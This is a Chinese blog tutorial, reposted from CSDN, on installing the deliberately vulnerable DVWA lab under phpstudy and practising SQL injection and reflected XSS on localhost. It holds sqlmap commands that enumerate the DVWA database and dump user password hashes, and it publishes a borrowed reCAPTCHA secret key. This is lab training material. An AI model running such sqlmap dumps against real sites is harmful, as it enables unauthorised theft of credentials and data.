php dvws,phpstudy配置dvwa——sql注入、xss攻击练习
phpstudy配置dvwa
首先进入网站下载phpstudy:https://www.xp.cn/download.html
安装完成后下载DVWA:https://dvwa.co.uk/,将DVWA解压在phpstudy目录下的WWW目录,然后将文件夹命名为DVWA,然后进入DVWA\config目录,更改配置文件为config.inc.php
编辑 dvwa/config/config.inc.php这个配置文件
$_DVWA[ ‘recaptcha_public_key’ ] = ‘’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘’;
key可以自己生成,地址是
https://www.google.com/recaptcha/admin/create
借用一下别人生成的
Site key:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
Secret key:
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K
把key填上就行了
$_DVWA[ ‘recaptcha_public_key’ ] = ‘6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K’;
原文链接:https://blog.csdn.net/RBPicsdn/article/details/80059132
然后进入phpstudy目录下的Extensions\php\php7.3.4nts目录,编辑php.ini,ctrl+F搜索allow_
保存退出,打开phpstudy
进入http://127.0.0.1/DVWA/setup.php,创建一下。然后登陆,登录账号名称为admin password
sql注入练习
登录后选择SQL Injection板块,F12-network,随便提交一个数据,进行抓取cookie
将cookie复制下来,然后cmd进入sqlmap文件夹下,输入:
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" --dbs
然后一路y同意,即可检索出数据库。
爆表名
因为我们是dvwa,所以数据库名选择dvwa,然后爆dvwa的表名
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa --tables
我们肯定是对users感兴趣啊,要的就是账号和密码,所以接下来爆users中的列名
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa -T users --columns
得到列名如下,我们感兴趣的是user和password:
爆账号和密码
接下来就是爆user和password中的数据了,这里我想说的是,你可以在爆数据的时候直接MD5解密,到时候会有选项提示,问你是否用kali中自带的字典进行解密
sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa -T users -C user,password --dump
最终得到账号和密码,达到目的
xss攻击dvwa
调成low难度后,在xss(reflected)里,输入什么返回什么,而GET传参,未出现明显的过滤,输入提交后有明显弹窗。
标签:sqlmap,xss,Submit,--,DVWA,phpstudy,dvwa,key
来源: https://blog.csdn.net/u014536801/article/details/114182769
php dvws,phpstudy配置dvwa——sql注入、xss攻击练习相关推荐
- tp中如何防止mysql注入_thinkphp如何防止sql注入xss攻击
SQL注入简介 SQL 注入漏洞(SQL Injection)是 Web 开发中最常见的一种安全漏洞.可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有 ...
- TP5 框架 防止 sql注入 + xss攻击 + session盗窃
话不多说 直接上正餐: TP5 框架 其实自身就舍友对sql注入以及xss攻击的防御 sql注入 + xss攻击 位置 application/config.php // 默认全局过滤方法 用逗号 ...
- 常见web攻击(sql注入,xss攻击,csrf攻击)
sql注入攻击 危害 方式:通过表单提交加入特殊字符 如:' OR 1=1#' 防范:用django的ORM,就大可不必考虑这个问题, 如果自己写,要用正则和其他方式进行过滤 xss(Cross ...
- DVWA SQL注入
DVWA SQL注入 安装及下载 dvwa. 插件等 请看上一篇文章 1.首先修改 low 2.SQL注入打开proxy switcher,如此修改 3. 打开Burp页面,关闭intercept 4 ...
- DVWA—sql注入( SQL Injection)
DVWA-sql注入( SQL Injection) 原理 将恶意的sql语句拼接到合法的语句中,从而达到执行sql语句的目的. 类型 数字 字符 搜索 过程 1.判断是否存在注入,注入时字符型还是数 ...
- DVWA sql注入 WP
sql注入基本思路: 1.源码 2.判断数字型和字符型 3.猜测字段数 4.查询数据库中的字段 5.查询表中的字段 6.查询user表中的字段 7.拿字段中数据 low: 1.源码: <?php ...
- DVWA sql注入(high)
有了前两关的基础,现在做起来,比较得心应手了 现在开始: 1.输入1' 输入1' and '1'='1 输入1' and '1'='2 由此可见,这也是一个字符型的注入 2.获取字段数 输入1' or ...
- urlScan 配置阻止sql注入
工具 urlscan_v31_x64 urlscan_v31_x86 URLScan是一个IIS下的ISAPI 筛选器,它能够限制服务器将要处理的HTTP请求的类型.通过阻止特定的 HTTP 请求,U ...
- DVWA SQL注入攻击
SQL注入原理 SQL注入就是通过SQL命令插入到web表单递交或输入域名页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据 ...
- SQL注入法攻击一日通
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安 ...
最新文章
- php红盾,红盾查询网_ubaike.cn - 小七发外链
- gzencode php demo,8个必备的PHP功能实例代码
- mappedBy reference an unknown target entity property解决方法
- Unity 2019 安装教程
- 天猫精灵家居对接第三方设备(详细版)
- 李笑来《财富自由之路》思维导图
- 显微镜下的大明内容_显微镜下的大明
- 17讲项目实战签证页面
- ElementUI表格如何获取当前行的数据?
- 中文界面blend_Blend Modes v3.4 – unity混合模式插件
- 关于打开网页FLASH显示叉叉问题
- esp8266 OTA 云远程更新固件 wifiupdate
- 《Designing and Training of A Dual CNN for Image Denoising》阅读笔记
- 单片机数字钟(调时,调时闪烁,万年历,年月日)超详细解析
- Layui导航栏下拉菜单不显示问题
- 计算机组装训练知识总结,计算机组装维护实训总结
- 微型计算机原理与接口技术考试附录
- final 修饰的成员变量必须手动初始化
- nginx webdav配置
- 数据库的概念模型与关系模型的设计与实现
热门文章
- 即时通讯领域必将最终由XMPP协议一统天下
- 关于《Delphi源代码分析》的讨论
- 深度学习caffe:损失函数
- 嵌入式linux入门六步曲
- 慕课网 机器学习基础、任务、分类等笔记
- 你缺的不是时间而是专注力
- Atitit java读取堵塞cmd命令行返回结果 java read maven 主要原理是另外线程读取标准流,错误流。。 回显增加out头,这样发布区分errstream和stdstream的
- Atitit.attilax重要案例 项目与解决方案与成果 v6 qa15
- paip.点击每个网页链接都提示下载的解决。
- piap.windows io 监测attilax总结